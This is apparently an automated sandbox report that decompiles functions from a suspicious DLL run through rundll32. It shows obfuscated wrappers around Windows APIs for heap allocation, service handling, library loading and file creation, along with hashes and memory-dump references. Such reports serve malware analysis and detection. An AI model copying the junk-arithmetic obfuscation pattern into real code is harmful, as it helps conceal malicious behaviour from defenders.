0x10008089
0x1000808f
0x1000809d
0x100080a3
0x100080ab
0x100080b7
0x100080bf
0x100080c7
0x100080db
0x100080dd
0x100080e1
0x100080e6
0x100080ec
0x100080ee
0x100080f0
0x100080f3
0x00000000
0x100080fa
0x100080ee
0x100080e1
0x100080db
0x100080c7
0x100080fb

APIs

Part of subcall function 10007476: __getptd.LIBCMT ref: 1000747C
Part of subcall function 10007476: __getptd.LIBCMT ref: 1000748C

__getptd.LIBCMT ref: 10008095

Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3

__getptd.LIBCMT ref: 100080A3

Strings

csm, xrefs: 100080B1

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
Instruction ID: 4ae378a3382de2502ebb08fd23938688d74dd022792fb74f3eadc7f97f552db9
Opcode Fuzzy Hash: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
Instruction Fuzzy Hash: E8016D38C003068AEBB4CF60C450A9EB7F5FF002E1F11842DE5C596AA6CF349A89CF85

Uniqueness

Uniqueness Score: -1.00%

Function 10004855, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E10004855(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t24;
				void* _t27;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edx;
				_push(0x44);
				E10007B2B(E1001544B, __ebx, __edi, __esi);
				E10001AA0(_t27 - 0x28, "invalid string position");
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				E100018F0(_t27 - 0x50, _t27 - 0x28);
				E10006B9C(_t27 - 0x50, 0x10019328);
				asm("int3");
				return 0 |  *((intOrPtr*)(E1000C3E3(__ebx, _t24, __edi, _t28) + 0x90)) != 0x00000000;
			}

0x10004855
0x10004855
0x10004855
0x1000485c
0x10004869
0x1000486e
0x10004879
0x10004887
0x1000488c
0x10007e9b

APIs

__EH_prolog3.LIBCMT ref: 1000485C
__CxxThrowException@8.LIBCMT ref: 10004887

Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C660,?,100010D3,00000000,00000003), ref: 10006BDE

Strings

invalid string position, xrefs: 10004861

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrow
String ID: invalid string position
API String ID: 1961742612-1799206989
Opcode ID: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
Instruction ID: a289488eb33a79d50a16d0c4e8742ffc37e96f116b2cec3b06e278b68cec2fa6
Opcode Fuzzy Hash: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
Instruction Fuzzy Hash: A3D017B5C111089AEB04D7E0CC42FDD7338EF08391F840424B211AA08ADF74B689C722

Uniqueness

Uniqueness Score: -1.00%

Function 10004380, Relevance: 5.1, APIs: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004380() {
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t24;
				void* _t29;
				signed int _t30;
				signed int _t35;
				void* _t38;
				intOrPtr _t42;
				signed short _t43;
				intOrPtr _t45;
				signed short* _t48;
				intOrPtr* _t56;
				intOrPtr _t61;
				void* _t62;
				void* _t67;

				_t21 =  *((intOrPtr*)(_t67 + 4));
				_t42 =  *((intOrPtr*)(_t21 + 4));
				_t23 =  *_t21 + 0x78;
				 *((intOrPtr*)(_t67 + 4)) = _t42;
				if( *((intOrPtr*)(_t23 + 4)) != 0) {
					_t61 =  *_t23;
					_t24 =  *((intOrPtr*)(_t61 + _t42 + 0x18));
					_t62 = _t61 + _t42;
					if(_t24 == 0 ||  *((intOrPtr*)(_t62 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						_t43 =  *(_t67 + 0xc);
						if(_t43 >> 0x10 != 0) {
							_t56 =  *((intOrPtr*)(_t62 + 0x20)) + _t42;
							_t48 =  *((intOrPtr*)(_t62 + 0x24)) + _t42;
							_t38 = 0;
							if(_t24 <= 0) {
								goto L15;
							} else {
								while(1) {
									_t29 = E10003D40(_t43,  *_t56 + _t42);
									_t67 = _t67 + 8;
									if(_t29 == 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t56 = _t56 + 4;
									_t48 =  &(_t48[1]);
									if(_t38 <  *((intOrPtr*)(_t62 + 0x18))) {
										_t42 =  *((intOrPtr*)(_t67 + 0x14));
										_t43 =  *(_t67 + 0x18);
										continue;
									} else {
										SetLastError(0x7f);
										return 0;
									}
									goto L18;
								}
								_t30 =  *_t48 & 0x0000ffff;
								_t42 =  *((intOrPtr*)(_t67 + 0x14));
								goto L14;
							}
						} else {
							_t35 = _t43 & 0x0000ffff;
							_t45 =  *((intOrPtr*)(_t62 + 0x10));
							if(_t35 < _t45) {
								L15:
								SetLastError(0x7f);
								return 0;
							} else {
								_t30 = _t35 - _t45;
								L14:
								if(_t30 <=  *((intOrPtr*)(_t62 + 0x14))) {
									return  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x1c)) + _t30 * 4 + _t42)) + _t42;
								} else {
									goto L15;
								}
							}
						}
					}
				} else {
					SetLastError(0x7f);
					return 0;
				}
				L18:
			}

0x10004380
0x10004384
0x10004389
0x10004390
0x10004394
0x100043a4
0x100043a6
0x100043aa
0x100043ae
0x10004458
0x10004461
0x100043be
0x100043be
0x100043cc
0x100043e2
0x100043e4
0x100043e6
0x100043ea
0x00000000
0x100043ec
0x100043f8
0x100043fe
0x10004403
0x10004408
0x00000000
0x00000000
0x1000440a
0x1000440b
0x1000440e
0x10004414
0x100043f0
0x100043f4
0x00000000
0x10004416
0x10004418
0x10004424
0x10004424
0x00000000
0x10004414
0x10004427
0x1000442a
0x00000000
0x1000442a
0x100043ce
0x100043ce
0x100043d1
0x100043d6
0x10004433
0x10004435
0x10004441
0x100043d8
0x100043d8
0x1000442e
0x10004431
0x10004453
0x00000000
0x00000000
0x00000000
0x10004431
0x100043d6
0x100043cc
0x10004396
0x10004398
0x100043a0
0x100043a0
0x00000000

APIs

SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398
SetLastError.KERNEL32(0000007F,00000010,00000000,00000000,0000000F,10003A72,00000000,RunDLL,00000000,?), ref: 10004435

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
Instruction ID: 3d8fb55c1078b9c3f35441da5e404d388ad798ba477897f7a328dd853c4c4054
Opcode Fuzzy Hash: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
Instruction Fuzzy Hash: B221F0726442128FE700DF54EC84A5BB3E0EBA8391F13812AF984D7245DA35FC10C765

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2760 Parent PID: 2816 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	960
Total number of Limit Nodes:	15

Executed Functions

Function 00217FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00217FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020E171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E0020606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x00217fcf
0x00217fd2
0x00217fd4
0x00217fd7
0x00217fda
0x00217fdd
0x00217fdf
0x00217fe4
0x00217fed
0x00217ff4
0x00217ffb
0x00218002
0x0021800e
0x00218013
0x00218018
0x0021801f
0x00218029
0x00218034
0x00218037
0x0021803b
0x00218042
0x00218049
0x00218050
0x0021806f
0x0021807e
0x00218084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 0021807E

Strings

Ia, xrefs: 00218018
K=, xrefs: 00217FE4

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: dfbefa5f0eacb4d084d418d9df743c078fd86ce6f563ca48260b774c42995e45
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: 1F115971E00218FBEF04DFE5C90A8DEBFB2FB41310F108589FA1466250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 002129A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00212A76

Strings

-:, xrefs: 002129C4

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: 7ef112fa26a77255a4daa9cd9cfe3600e63f5ec583ceb1c0f84a816f54a38c6d
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: ED2123B2D01219BBDF15DFD5C84A8DEBBB5FF04758F108488E92866250D3B94B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002030A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E002030A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020E171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E0020606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x002030ab
0x002030ae
0x002030b0
0x002030b3
0x002030b7
0x002030b8
0x002030bd
0x002030c6
0x002030cd
0x002030d4
0x002030db
0x002030e2
0x002030e9
0x002030f5
0x002030fa
0x002030ff
0x00203109
0x00203114
0x00203117
0x0020311e
0x00203125
0x0020312c
0x0020314b
0x00203154
0x0020315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 00203154

Strings

_;m, xrefs: 0020313C

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: 1d9e89e52a91a244160e2b79a98c7f1ca371648d944d8b29d2a24f2414c539fd
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: FE112B76E00218FFEB04DFE8CC468DEBB72EB44310F108599E524AB292D7B55B619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0020E172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0020E172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020E171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E0020606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x0020e178
0x0020e17b
0x0020e17e
0x0020e181
0x0020e185
0x0020e186
0x0020e18b
0x0020e192
0x0020e19e
0x0020e1a5
0x0020e1ac
0x0020e1b3
0x0020e1ba
0x0020e1c1
0x0020e1c8
0x0020e1cf
0x0020e1d6
0x0020e1dd
0x0020e1e4
0x0020e1eb
0x0020e1f2
0x0020e1f6
0x0020e1fd
0x0020e21c
0x0020e22d
0x0020e232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 0020E22D

Strings

,., xrefs: 0020E192

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: 796cd93b399a246a96f93006d70bccf4c01706f8bfec9fdf91499b42611eb9a9
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: C91107B6D0020DFFEF01DFD4D94A8AEBB71FB14304F108188E91566261D3B58B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00217998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E00217998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0020E171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E0020606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x0021799e
0x002179a1
0x002179a4
0x002179a9
0x002179ae
0x002179b5
0x002179bc
0x002179c3
0x002179c7
0x002179ce
0x002179d5
0x002179dc
0x002179e3
0x002179ea
0x002179f1
0x002179f5
0x002179f9
0x002179fd
0x00217a04
0x00217a0b
0x00217a12
0x00217a19
0x00217a1d
0x00217a30
0x00217a37
0x00217a3e
0x00217a3f
0x00217a4a
0x00217a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 00217A4A

Strings

rV, xrefs: 002179C7

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: 51aaf72279240b3427657f8a01b34e6ff171b02920f4e43d4e6d53b21a84f31c
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: BD11F6B6D1160DBBDB14DFA4C84A49EBBB4BB00309F208588E52566291D3B44B249F50

Uniqueness

Uniqueness Score: -1.00%

Function 0021C7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E0021C7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E0020606F(_t44);
				ExitProcess(0);
			}

0x0021c7c9
0x0021c7cd
0x0021c7d4
0x0021c7db
0x0021c7e2
0x0021c7e9
0x0021c7ed
0x0021c7f4
0x0021c7fb
0x0021c802
0x0021c809
0x0021c810
0x0021c817
0x0021c81e
0x0021c825
0x0021c82c
0x0021c833
0x0021c83b
0x0021c842
0x0021c849
0x0021c85c
0x0021c862
0x0021c863
0x0021c86a
0x0021c86b
0x0021c875

APIs

ExitProcess.KERNELBASE(00000000), ref: 0021C875

Strings

C, xrefs: 0021C817

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: 71b5868433335404fa725c8bdd3f9e443f8958d107d5e924568e0322407f8bd5
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: 74111CB5D0131DEBEB44CFE5D94A5EEBBB0FB04318F108189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 00210DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00210DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0020E171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E0020606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x00210deb
0x00210dee
0x00210df1
0x00210df6
0x00210dfb
0x00210e04
0x00210e0b
0x00210e18
0x00210e1c
0x00210e1f
0x00210e26
0x00210e32
0x00210e37
0x00210e3a
0x00210e41
0x00210e4c
0x00210e4d
0x00210e4e
0x00210e55
0x00210e58
0x00210e5f
0x00210e66
0x00210e6d
0x00210e78
0x00210e79
0x00210e7c
0x00210e8f
0x00210e9a
0x00210e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 00210E9A

Strings

Hh, xrefs: 00210E58

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: df85e849d0e6e9b4ee3565cc8a05ce2246780f8bf0f92f8d1783b4761e428145
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: 72110374D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E524AB2A1D3B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 00218409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00218409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020E171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E0020606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x00218411
0x00218416
0x00218418
0x0021841b
0x0021841e
0x0021841f
0x00218422
0x00218425
0x00218428
0x0021842b
0x0021842c
0x0021842f
0x00218432
0x00218435
0x00218437
0x0021843c
0x00218445
0x00218448
0x00218455
0x00218458
0x0021845f
0x00218462
0x00218469
0x00218470
0x00218474
0x0021847b
0x00218487
0x00218488
0x00218494
0x00218499
0x002184a0
0x002184aa
0x002184b5
0x002184b8
0x002184d7
0x002184ee
0x002184f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 002184EE

Memory Dump Source

Source File: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000A.00000002.2099037310.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2099077185.000000000021F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
